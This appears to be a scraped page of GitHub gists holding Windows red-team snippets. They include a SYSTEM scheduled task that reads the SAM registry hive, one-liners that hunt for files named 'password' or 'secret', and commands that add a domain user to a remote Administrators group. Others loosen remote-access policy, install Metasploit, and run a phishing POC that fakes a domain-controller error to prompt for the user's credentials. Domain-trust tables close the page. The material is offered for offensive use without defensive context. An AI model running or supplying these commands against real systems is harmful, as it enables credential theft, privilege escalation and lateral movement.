This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# all files in sortable csv | |
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv" | |
# grep for specific file types | |
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv" | |
# grep for specific key words in file names | |
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Add a domain user to a remote server local group, if your current user has admin over the remote machine | |
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user') | |
# Get all local groups on a remote server | |
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}" | |
# Find members of the local Administrators group on a remote server | |
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }" | |
# Enable the local Administrator account on a remote server |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Run winrm quickconfig defaults | |
echo Y | winrm quickconfig | |
#Run enable psremoting command with defaults | |
Enable-PSRemoting -force | |
# adjust local token filter policy | |
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord | |
#Enabled Trusted Hosts for Universial Access |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
sudo apt-get install git | |
cd /tmp/ | |
git clone https://github.com/darkoperator/MSF-Installer.git | |
cd MSF-Installer | |
sudo ./msf_install.sh -i | |
source ~/.bashrc | |
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/ | |
# POC from greg.foss[at]owasp.org | |
function prompt { | |
Add-Type -AssemblyName Microsoft.VisualBasic | |
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720') | |
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name | |
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# user to SID | |
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value | |
# SID to user | |
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SourceDomain | TargetDomain | TrustType | TrustDirection | |
---|---|---|---|---|
finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
mothership.com | engineering.mothership.com | ParentChild | Bidirectional | |
corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
corp.mothership.com | subsidiary.com | External | Inbound | |
finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
engineering.mothership.com | mothership.com | ParentChild | Bidirectional | |
subsidiary.com | product.subsidiary.com | ParentChild | Bidirectional |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SourceDomain | TargetDomain | TrustType | TrustDirection | |
---|---|---|---|---|
finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
mothership.com | contracts.mothership.com | ParentChild | Bidirectional | |
corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
contracts.mothership.com | mothership.com | ParentChild | Bidirectional | |
contracts.mothership.com | product.othercompany.com | External | Inbound | |
product.othercompany.com | contracts.mothership.com | External | Outbound | |
product.othercompany.com | othercompany.com | ParentChild | Bidirectional |
OlderNewer